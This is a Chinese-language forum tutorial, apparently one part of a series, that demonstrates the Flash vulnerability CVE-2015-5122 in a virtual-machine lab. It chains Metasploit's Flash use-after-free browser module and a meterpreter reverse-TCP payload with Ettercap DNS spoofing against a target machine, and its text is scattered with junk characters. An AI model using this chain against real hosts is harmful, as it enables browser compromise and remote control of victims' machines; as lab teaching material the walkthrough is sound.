|
* J* [! s2 b7 _
二、cve2015-5122漏洞实例演示虚拟机 * {* [8 b$ H! o) w$ z5 W
2 Z q( m: b: |' f+ K. {$ x6 g) r: X# W" ]
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: / b3 \ } ^+ B: E
( k1 J2 x( O8 w$ _8 g) X$ }0 S) g
3 i# {* F F0 L, K8 d search cve-2015-5122如图: 1 S- F& E a" u, @, ?/ w/ K
1 ?. H) f, J: U2 }4 w/ x4 @
' _# f1 }6 o7 U/ o$ Q6 o! ~
+ R0 b0 t o/ O `& j $ C$ x5 {3 t; a$ c' ~( f
9 T7 h& i0 f% [7 F* k2 s) }
下面我们敲如下命令: ) V. n' x9 i$ b7 y( u! H
6 C M' I$ U/ q* X% Y* `
6 U/ c/ G& V2 U, V& n8 W& H% D use exploit/multi/browser/adobe_flash_opaque_background_uaf
' [, z3 J# @! r) l
, c; y) D! O3 e" O4 w8 U8 m2 o+ @( r8 r
set PAYLOAD windows/meterpreter/reverse_tcp
2 s6 w$ h) n2 D& h4 X * z; U/ b% X% G! @( o1 e: \+ Q2 o
: t# f# E3 B$ p B6 P; [ set LHOST 192.168.0.109
+ P+ ~2 J1 V! B) w% j , I- d3 h3 p, D( L4 i$ A
7 f1 n. |$ f! v: U0 x. a
set URIPATH / /*根目录*/ ; s# A3 y' M* U( R* n# [ j1 W/ A$ J
+ z) m, `. C2 K9 V; l* T
7 O1 C8 K$ L; o O! Z set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ' i5 I! h) ?& [( V7 J) p7 p
2 Q6 C+ p# ~- Y8 y% w3 Q1 ]
7 O R7 r/ ^8 X
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
6 l+ Q$ C8 k* a9 W: X( U/ O. Y
1 g1 t3 L6 H; b: h+ _% F# O( e* |
' `& s2 p1 ]& l' P 然后show options如图:
7 z0 t0 {* B! r* X3 L! F; |
" L0 v/ w7 t8 [. u k$ j3 R8 r) M1 |. Q% {( @
2 B p: `. Q# {/ V7 b |
0 {+ v/ Y/ z& e$ L) p; l4 h; S3 |6 E G( p* q$ v9 Y3 P
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
* i# x2 |0 Y% E, e9 C3 A- } : l. ?+ g& T; v3 U3 A1 h( c
: D) b6 `. `* q- h! P W |3 |" ?: U3 M7 ]0 M+ `
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 * `' c2 h8 m' d
: |3 Z$ u6 d! h2 |7 y* }: q$ T( U6 ~' I+ X
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
3 z4 E# R* H- g' ]" n2 k , p2 _9 g3 P5 N8 w, a
4 U/ r6 v* G( D* K( M ?! J* F
) h! X0 C" c. O
. i7 M2 O. i, g0 n/ I) K( I
, ^: {5 H0 U! T- W' ~( o. m& L 成功了,这时候我们断开ettercap,如图: 8 q& h: U; p/ `
$ D! h* ?( t: s1 X6 r" O
. j+ Y" m% r7 G$ L
$ l3 H; L. q- r; N5 C6 r3 x
1 i0 x) F' S/ T0 M) o9 O" g3 n2 @- f8 [% b; V0 Z
Screenshot如图: 6 s6 D) ?/ h( r, Q U
) G1 |( f: h0 m& H9 i; ~* P" U
# C; d( D U& v* L" W+ C ; ~8 @+ g( }/ a7 ]: w+ u0 m
; S0 B. C5 S) T" I
2 n$ I- Z6 J3 ^2 ?) ` 2 K0 Q6 ^; R) `, H! R9 _; }
|